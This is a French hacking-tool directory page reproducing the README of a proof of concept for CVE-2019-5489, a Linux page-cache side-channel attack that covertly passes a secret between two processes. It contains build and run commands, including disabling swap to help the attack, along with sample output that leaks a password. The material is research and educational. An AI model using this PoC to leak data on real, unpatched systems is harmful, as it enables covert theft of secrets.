Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-5489 — Attaques par canal auxiliaire du cache de pages (CVE-2019-5489) preuve de concept pour Linux | Kitploit
Outils/GitHubGitHub/mmxsrup/cve-2019-5489
Analyse des VulnérabilitésExploitationCollecte d'InformationsArticles et RechercheApprentissage et ÉducationExploitation de Binaires
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Attaques par canal auxiliaire du cache de pages (CVE-2019-5489) preuve de concept pour Linux

Voir le dépôt
1037il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE 2019-5489

Ce dépôt contient une preuve de concept des attaques par canal latéral du cache de pages (CVE-2019-5489) pour Linux.

Afin d'évaluer le canal latéral du cache de pages, j'ai implémenté un canal caché entre deux processus. Le processus émetteur envoie des données confidentielles à un processus récepteur via le canal latéral du cache de pages. Les attaques du cache de pages ont été atténuées dans Linux Kernel 5.0 et versions ultérieures, donc cette PoC ne fonctionnera qu'avant Linux Kernel 5.0.

NOTE : J'ai testé et cela fonctionne sur Ubuntu 18.04, Linux 4.15.0-70.

Building

Exécutez la commande suivante.

git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

Running

Désactivez l'espace d'échange pour faciliter l'attaque.

swapoff -a

Terminal 1

Tout d'abord, exécutez la commande suivante dans le terminal 1.

make run-sender

Terminal 2

Une fois que sending 1th character ... s'affiche dans le terminal 1, exécutez la commande suivante.

make run-receiver

Output

Si l'exécution réussit, la sortie suivante sera affichée.
Cela montre que la clé a été envoyée du processus Émetteur au processus Récepteur via le canal latéral du cache de pages.

Terminal 1

LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

Terminal 2

LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

References

  • Daniel Gruss et al. Page cache attacks [CCS 19]
Télécharger l’outil